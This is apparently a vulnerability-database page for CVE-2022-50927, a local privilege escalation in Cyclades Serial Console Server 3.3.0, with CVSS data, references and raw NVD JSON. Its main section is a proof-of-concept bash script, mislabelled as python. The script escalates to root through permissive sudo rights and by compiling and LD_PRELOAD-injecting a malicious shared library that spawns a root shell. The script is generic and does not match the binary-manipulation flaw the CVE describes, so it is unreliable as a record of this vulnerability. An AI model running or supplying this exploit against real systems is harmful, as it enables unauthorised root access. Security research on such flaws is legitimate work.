CVE-2022-50927

Description

Cyclades Serial Console Server 3.3.0 contains a local privilege escalation vulnerability due to overly permissive sudo privileges for the admin user and admin group. Attackers can exploit the default user configuration to gain root access by manipulating system binaries and leveraging unrestricted sudo permissions.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Cyclades Serial Console Server 3.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2022-50927 PoC - Cyclades Serial Console Server Local Privilege Escalation
# This PoC demonstrates exploiting overly permissive sudo privileges

echo "[*] CVE-2022-50927 Local Privilege Escalation PoC"
echo "[*] Target: Cyclades Serial Console Server 3.3.0"

# Check if current user has sudo privileges without password
echo "[+] Checking sudo privileges..."
sudo -l 2>/dev/null | grep -E "\(ALL : ALL\)|\(ALL : NOPASSWD\)"

if [ $? -eq 0 ]; then
    echo "[+] Vulnerable configuration detected!"
    echo "[+] Current user can execute sudo commands without password"
    
    # Method 1: Direct root shell
    echo "[+] Attempting to gain root access..."
    sudo su - root
    
    # If successful, we should have a root shell
    if [ $? -eq 0 ]; then
        echo "[!] Root shell obtained!"
        id
    fi
else
    echo "[-] Current user does not appear to have exploitable sudo privileges"
    echo "[-] This PoC requires admin group membership"
fi

# Alternative method using LD_PRELOAD
echo "[+] Alternative method using shared library injection..."
cat > /tmp/rootshell.c << 'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    if (!getuid()) {
        unlink("/tmp/rootshell.so");
        setuid(0);
        setgid(0);
        execl("/bin/sh", "sh", NULL);
    }
}
EOF

gcc -fPIC -shared -o /tmp/rootshell.so /tmp/rootshell.c 2>/dev/null
sudo LD_PRELOAD=/tmp/rootshell.so /bin/bash

rm -f /tmp/rootshell.c /tmp/rootshell.so

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50927
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50927
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50927/
[4] VulDB https://vuldb.com/cve/CVE-2022-50927
[5] https://www.exploit-db.com/exploits/50773
[6] https://www.vertiv.com/en-us/
[7] https://www.vulncheck.com/advisories/cyclades-serial-console-server-local-privilege-escalation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50927", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:57.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cyclades Serial Console Server 3.3.0 contains a local privilege escalation vulnerability due to overly permissive sudo privileges for the admin user and admin group. Attackers can exploit the default user configuration to gain root access by manipulating system binaries and leveraging unrestricted sudo permissions."}, {"lang": "es", "value": "Cyclades Serial Console Server 3.3.0 contiene una vulnerabilidad de escalada de privilegios local debido a privilegios sudo excesivamente permisivos para el usuario admin y el grupo admin. Los atacantes pueden explotar la configuración de usuario predeterminada para obtener acceso de root manipulando binarios del sistema y aprovechando permisos sudo sin restricciones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50773", "source": "[email protected]"}, {"url": "https://www.vertiv.com/en-us/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/cyclades-serial-console-server-local-privilege-escalation", "source": "[email protected]"}]}}